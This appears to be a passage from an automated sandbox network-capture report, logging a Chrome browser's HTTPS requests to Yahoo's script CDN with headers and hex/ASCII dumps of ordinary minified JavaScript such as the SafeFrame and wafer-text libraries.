                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 65 2e 62 6f 75 6e 64 61 72 79 2c 69 3d 65 2e 65 6c 65 6d 2c 61 3d 69 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 65 6e 64 2d 73 63 72 6e 2d 63 6c 61 73 73 22 29 2c 6e 3d 61 26 26 74 26 26 62 28 69 2c 74 29 2c 6f 3d 6e 26 26 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3b 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6e 64 53 63 72 65 65 6e 45 6c 3d 6f 7d 7d 2c 7b 6b 65 79 3a 22 5f 61 64 64 4e 61 74 69 76 65 56 69 64 65 6f 45 76 65 6e 74 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6c 65 6d 3b 74 68 69 73 2e 5f 73 74 61 74 65 2e 6c 6f 6f 70 43 6f 75 6e 74 26 26 28 65 2e 6c 6f 6f 70 3d 21 31 2c 67 28 65 2c 22 65 6e 64 65 64 22 2c 74 68 69 73 2e 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e.boundary,i=e.elem,a=i.getAttribute(_+"end-scrn-class"),n=a&&t&&b(i,t),o=n&&n.getElementsByClassName(a)[0];this._util.endScreenEl=o}},{key:"_addNativeVideoEvents",value:function(){var e=this._util.elem;this._state.loopCount&&(e.loop=!1,g(e,"ended",this.h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 69 73 2e 5f 75 74 69 6c 2e 74 79 70 65 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 6c 6f 6f 70 43 6f 75 6e 74 3b 65 26 26 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 6c 6f 6f 70 43 6f 75 6e 74 3d 4e 75 6d 62 65 72 28 65 29 29 2c 74 68 69 73 2e 5f 63 72 65 61 74 65 44 65 66 61 75 6c 74 28 21 30 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 56 69 64 65 6f 4d 6f 75 73 65 4c 65 61 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 79 76 69 64 65 6f 50 6c 61 79 6c 69 73 74 22 3d 3d 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 74 79 70 65 26 26 77 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 54 69 6d 65 6f 75 74 2c 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 4e 61 74 69 76 65 56 69 64 65 6f 45 6e 64 22 2c 76 61 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: is._util.type){var e=this._util.loopCount;e&&(this._state.loopCount=Number(e)),this._createDefault(!0)}}},{key:"handleVideoMouseLeave",value:function(e){"yvideoPlaylist"===this._util.type&&w(this._state.mouseTimeout,this)}},{key:"handleNativeVideoEnd",val


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              84192.168.2.45110487.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC537OUTGET /aaq/wf/wf-text-1.2.0-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: 6b4A4kOZG58hHPgYD0S7mtgTFkpMUF5umJwp6OZzb0QOoqc6L/J0AkQiULXnbSomKZ6gYP46ET4=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: X2TJRYWGXZ7SAT73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sat, 05 Oct 2024 15:17:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 23 Aug 2021 06:24:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "956dabf4d28930bc42d934995b814d6d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: 8acCB8Oldv6HTX7VU3iQtZux9BoZJqhX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 3412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 273343
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 74 65 78 74 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 74 65 78 74 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d 2c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-text",[],t):"object"==typeof exports?exports["wafer-text"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC812INData Raw: 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 66 3d 72 2e 73 65 6c 65 63 74 6f 72 3b 6f 28 74 68 69 73 2c 74 29 3b 76 61 72 20 69 3d 6e 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 7b 73 65 6c 65 63 74 6f 72 3a 66 7d 2c 7b 53 54 41 54 45 5f 41 54 54 52 53 3a 6c 7d 29 29 3b 72 65 74 75 72 6e 20 69 2e 5f 75 74 69 6c 3d 75 28 7b 7d 2c 69 2e 5f 75 74 69 6c 2c 7b 65 6c 65 6d 3a 65 7d 29 2c 69 2e 73 74 61 74 65 44 69 64 55 70 64 61 74 65 28 29 2c 69 7d 72 65 74 75 72 6e 20 66 28 74 2c 65 29 2c 73 28 74 2c 5b 7b 6b 65 79 3a 22 73 74 61 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: length>1&&void 0!==arguments[1]?arguments[1]:{},f=r.selector;o(this,t);var i=n(this,(t.__proto__||Object.getPrototypeOf(t)).call(this,e,{selector:f},{STATE_ATTRS:l}));return i._util=u({},i._util,{elem:e}),i.stateDidUpdate(),i}return f(t,e),s(t,[{key:"stat


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              85192.168.2.45110787.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC362OUTGET /uc/sf/0.1.434/js/safe.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC627INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: 5ZVT3Pb+Y7yeOzdYqNetOWHNduhL3pSHvUuqX5W7JeYlRyhr15SZpaTLKuc/bT8p6m9aheIcyBY=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 5CV4QR832GA236NK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Wed, 18 Sep 2024 14:01:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 25 Apr 2024 19:26:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "60f19ca2f094acabba5b7988467387c4"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 77851
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 1746730
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 2f 2a 21 20 53 41 46 45 46 52 41 4d 45 20 30 2e 31 2e 34 33 34 20 c2 a9 20 32 30 32 34 2c 20 59 61 68 6f 6f 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 39 34 36 36 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b 28 65 3d 76 6f 69 64 20 30 3d 3d 3d 65 3f 7b 7d 3a 65 29 2e 63 6c 6f 73 65 3d 7b 6e 61 6d 65 3a 22 63 6c 6f 73 65 22 2c 68 65 69 67 68 74 3a 34 38 2c 77 69 64 74 68 3a 34 38 2c 70 61 74 68 3a 22 4d 33 37 2e 39 38 20 33 34 2e 38 32 37 6c 2d 39 2e 39 2d 39 2e 39 20 39 2e 39 2d 39 2e 38 39 38 63 2e 37 38 2d 2e 37 38 32 2e 37 38 2d 32 2e 30 35 20 30 2d 32 2e 38 33 2d 2e 37 38 2d 2e 37 38 2d 32 2e 30 34 37 2d 2e 37 38 2d 32 2e 38 32 38 20 30 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: /*! SAFEFRAME 0.1.434 2024, Yahoo Inc. All rights reserved. */!function(){var t={9466:function(t){var e;(e=void 0===e?{}:e).close={name:"close",height:48,width:48,path:"M37.98 34.827l-9.9-9.9 9.9-9.898c.78-.782.78-2.05 0-2.83-.78-.78-2.047-.78-2.828 0l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 3a 6e 2e 63 6f 6f 6b 69 65 73 3b 69 66 28 6e 3d 63 28 6e 29 2c 65 3d 65 7c 7c 7b 7d 2c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 29 72 65 74 75 72 6e 20 6e 2e 65 72 72 6f 72 28 5b 22 43 6f 6f 6b 69 65 3a 3a 67 65 74 20 2d 20 69 6e 76 61 6c 69 64 20 69 6e 70 75 74 22 2c 7b 6e 61 6d 65 3a 74 2c 6f 70 74 73 3a 65 7d 2c 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 5d 2e 6a 6f 69 6e 28 22 5c 6e 22 29 29 2c 6e 75 6c 6c 3b 76 61 72 20 73 3d 72 5b 74 5d 3b 72 65 74 75 72 6e 20 65 2e 6a 73 6f 6e 26 26 73 26 26 28 73 3d 69 28 73 29 29 2c 76 6f 69 64 20 30 21 3d 3d 73 3f 73 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 70 28 74 2c 65 2c 6e 29 7b 65 3d 65 7c 7c 7b 7d 3b 76 61 72 20 72 3d 66 28 74 2c 6e 75 6c 6c 2c 6e 29 3b 69 66 28 22 73 74 72 69 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :n.cookies;if(n=c(n),e=e||{},"string"!=typeof t)return n.error(["Cookie::get - invalid input",{name:t,opts:e},(new Error).stack].join("\n")),null;var s=r[t];return e.json&&s&&(s=i(s)),void 0!==s?s:null}function p(t,e,n){e=e||{};var r=f(t,null,n);if("strin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 6f 6e 29 2c 72 2e 6a 73 6f 6e 3d 21 31 2c 68 28 74 2c 69 2c 72 29 7d 2c 74 2e 65 78 70 6f 72 74 73 2e 73 65 74 53 75 62 73 3d 68 7d 2c 33 32 31 35 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3b 74 72 79 7b 6e 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 74 29 7d 63 61 74 63 68 28 74 29 7b 63 6f 6e 73 6f 6c 65 26 26 63 6f 6e 73 6f 6c 65 2e 64 69 72 26 26 63 6f 6e 73 6f 6c 65 2e 64 69 72 28 74 29 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 65 3f 7b 7d 3a 65 7d 72 65 74 75 72 6e 20 6e 7d 7d 2c 33 39 34 35 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: on),r.json=!1,h(t,i,r)},t.exports.setSubs=h},3215:function(t){"use strict";t.exports=function(t,e){var n;try{n=JSON.parse(t)}catch(t){console&&console.dir&&console.dir(t),n=void 0===e?{}:e}return n}},3945:function(t){"use strict";t.exports=function(t,e){v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 74 28 6f 2e 70 61 74 68 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 6f 70 74 69 6f 6e 20 70 61 74 68 20 69 73 20 69 6e 76 61 6c 69 64 22 29 3b 63 2b 3d 22 3b 20 50 61 74 68 3d 22 2b 6f 2e 70 61 74 68 7d 6f 2e 65 78 70 69 72 65 73 26 26 28 63 2b 3d 22 3b 20 45 78 70 69 72 65 73 3d 22 2b 6f 2e 65 78 70 69 72 65 73 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 29 3b 6f 2e 68 74 74 70 4f 6e 6c 79 26 26 28 63 2b 3d 22 3b 20 48 74 74 70 4f 6e 6c 79 22 29 3b 6f 2e 73 65 63 75 72 65 26 26 28 63 2b 3d 22 3b 20 53 65 63 75 72 65 22 29 3b 6f 2e 66 69 72 73 74 50 61 72 74 79 4f 6e 6c 79 26 26 28 63 2b 3d 22 3b 20 46 69 72 73 74 2d 50 61 72 74 79 2d 4f 6e 6c 79 22 29 3b 72 65 74 75 72 6e 20 63 7d 3b 76 61 72 20 6e 3d 64 65 63 6f 64 65 55 52 49 43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t(o.path))throw new TypeError("option path is invalid");c+="; Path="+o.path}o.expires&&(c+="; Expires="+o.expires.toUTCString());o.httpOnly&&(c+="; HttpOnly");o.secure&&(c+="; Secure");o.firstPartyOnly&&(c+="; First-Party-Only");return c};var n=decodeURIC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 36 30 38 30 29 2c 6f 3d 6e 28 39 35 36 35 29 2c 69 3d 6e 28 38 39 38 31 29 2c 73 3d 6e 28 36 33 31 39 29 2c 61 3d 6e 28 34 32 30 39 29 2c 63 3d 6e 28 33 35 31 37 29 2c 75 3d 6e 28 36 31 39 38 29 2c 6c 3d 6e 28 34 36 35 39 29 2c 66 3d 6e 28 38 31 29 2c 70 3d 6e 28 38 35 31 29 2c 68 3d 41 72 72 61 79 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 69 28 74 29 2c 6e 3d 63 28 74 68 69 73 29 2c 64 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6d 3d 64 3e 31 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 76 6f 69 64 20 30 2c 76 3d 76 6f 69 64 20 30 21 3d 3d 6d 3b 76 26 26 28 6d 3d 72 28 6d 2c 64 3e 32 3f 61 72 67 75 6d 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tion(t,e,n){"use strict";var r=n(6080),o=n(9565),i=n(8981),s=n(6319),a=n(4209),c=n(3517),u=n(6198),l=n(4659),f=n(81),p=n(851),h=Array;t.exports=function(t){var e=i(t),n=c(this),d=arguments.length,m=d>1?arguments[1]:void 0,v=void 0!==m;v&&(m=r(m,d>2?argume
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 38 35 35 31 29 2c 6f 3d 6e 28 39 35 33 39 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 69 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 69 3f 65 28 72 28 6e 29 5b 30 5d 2c 6e 5b 31 5d 29 3a 65 28 6e 29 7d 63 61 74 63 68 28 65 29 7b 6f 28 74 2c 22 74 68 72 6f 77 22 2c 65 29 7d 7d 7d 2c 34 35 37 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 39 35 30 34 29 2c 6f 3d 72 28 7b 7d 2e 74 6f 53 74 72 69 6e 67 29 2c 69 3d 72 28 22 22 2e 73 6c 69 63 65 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 69 28 6f 28 74 29 2c 38 2c 2d 31 29 7d 7d 2c 36 39 35 35 3a 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: strict";var r=n(8551),o=n(9539);t.exports=function(t,e,n,i){try{return i?e(r(n)[0],n[1]):e(n)}catch(e){o(t,"throw",e)}}},4576:function(t,e,n){"use strict";var r=n(9504),o=r({}.toString),i=r("".slice);t.exports=function(t){return i(o(t),8,-1)}},6955:functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 3a 21 28 32 26 74 29 2c 77 72 69 74 61 62 6c 65 3a 21 28 34 26 74 29 2c 76 61 6c 75 65 3a 65 7d 7d 7d 2c 34 36 35 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 33 37 32 34 29 2c 6f 3d 6e 28 34 39 31 33 29 2c 69 3d 6e 28 36 39 38 30 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 72 3f 6f 2e 66 28 74 2c 65 2c 69 28 30 2c 6e 29 29 3a 74 5b 65 5d 3d 6e 7d 7d 2c 32 31 30 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 32 38 33 29 2c 6f 3d 6e 28 34 39 31 33 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 67 65 74 26 26 72 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :!(2&t),writable:!(4&t),value:e}}},4659:function(t,e,n){"use strict";var r=n(3724),o=n(4913),i=n(6980);t.exports=function(t,e,n){r?o.f(t,e,i(0,n)):t[e]=n}},2106:function(t,e,n){"use strict";var r=n(283),o=n(4913);t.exports=function(t,e,n){return n.get&&r(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 65 78 70 6f 72 74 73 3d 7b 43 53 53 52 75 6c 65 4c 69 73 74 3a 30 2c 43 53 53 53 74 79 6c 65 44 65 63 6c 61 72 61 74 69 6f 6e 3a 30 2c 43 53 53 56 61 6c 75 65 4c 69 73 74 3a 30 2c 43 6c 69 65 6e 74 52 65 63 74 4c 69 73 74 3a 30 2c 44 4f 4d 52 65 63 74 4c 69 73 74 3a 30 2c 44 4f 4d 53 74 72 69 6e 67 4c 69 73 74 3a 30 2c 44 4f 4d 54 6f 6b 65 6e 4c 69 73 74 3a 31 2c 44 61 74 61 54 72 61 6e 73 66 65 72 49 74 65 6d 4c 69 73 74 3a 30 2c 46 69 6c 65 4c 69 73 74 3a 30 2c 48 54 4d 4c 41 6c 6c 43 6f 6c 6c 65 63 74 69 6f 6e 3a 30 2c 48 54 4d 4c 43 6f 6c 6c 65 63 74 69 6f 6e 3a 30 2c 48 54 4d 4c 46 6f 72 6d 45 6c 65 6d 65 6e 74 3a 30 2c 48 54 4d 4c 53 65 6c 65 63 74 45 6c 65 6d 65 6e 74 3a 30 2c 4d 65 64 69 61 4c 69 73 74 3a 30 2c 4d 69 6d 65 54 79 70 65 41 72 72 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: exports={CSSRuleList:0,CSSStyleDeclaration:0,CSSValueList:0,ClientRectList:0,DOMRectList:0,DOMStringList:0,DOMTokenList:1,DataTransferItemList:0,FileList:0,HTMLAllCollection:0,HTMLCollection:0,HTMLFormElement:0,HTMLSelectElement:0,MediaList:0,MimeTypeArra
